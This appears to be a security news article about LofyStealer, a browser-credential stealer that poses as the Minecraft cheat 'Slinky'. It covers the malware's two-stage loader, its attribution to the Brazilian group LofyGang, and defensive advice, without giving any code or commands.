A sophisticated malware known as LofyStealer is targeting Minecraft enthusiasts by masquerading as a cheat tool named “Slinky.” This dangerous software employs advanced techniques to stealthily extract sensitive information from web browsers.
Malware Operation and Impact
LofyStealer executes a two-stage attack, effectively bypassing standard security measures. It utilizes a Node.js-based loader in conjunction with a C++ payload to infiltrate browser memory. The malware affects major browsers such as Chrome, Edge, and Firefox, extracting valuable data like passwords and payment information.
The campaign’s complexity surpasses typical gaming malware, targeting eight prominent browsers. It silently accesses cookies, saved passwords, and other critical data, making it a significant threat to users.
Discovery and Attribution
Security experts at Zenox.ai discovered LofyStealer during a threat analysis on the ANY.RUN sandbox platform. Their investigations linked the malware to LofyGang, a cybercrime group from Brazil, known since October 2022 for similar activities.
Evidence includes Brazilian Portuguese code strings and a command-and-control server located in Brazil. The server’s branding as “LofyStealer, Advanced C2 Platform V2.0” further supports these findings.
Malware Distribution and Prevention
LofyStealer’s distribution relies heavily on social engineering, disguising the malicious file as a legitimate Minecraft cheat. This tactic is effective due to Minecraft’s young audience, who often download unofficial mods.
Organizations should discourage downloading from untrusted sources and enhance security measures. Utilizing endpoint protection with in-memory injection detection and enabling multi-factor authentication can reduce risks significantly.
Technical Sophistication and Defense
The malware’s technical prowess lies in its in-memory injection capabilities. The second-stage payload, chromelevator.exe, integrates into browser processes undetected by traditional security systems. It avoids common API calls, using direct syscalls to remain hidden.
Data is extracted and transmitted to the C2 server using a concealed PowerShell command, ensuring minimal detection. Blocking traffic to specific IPs and monitoring for suspicious PowerShell activity are recommended countermeasures.
For enhanced protection, users are advised to refrain from downloading unofficial game utilities and to implement robust security practices. Staying informed and proactive is crucial in combating threats like LofyStealer.
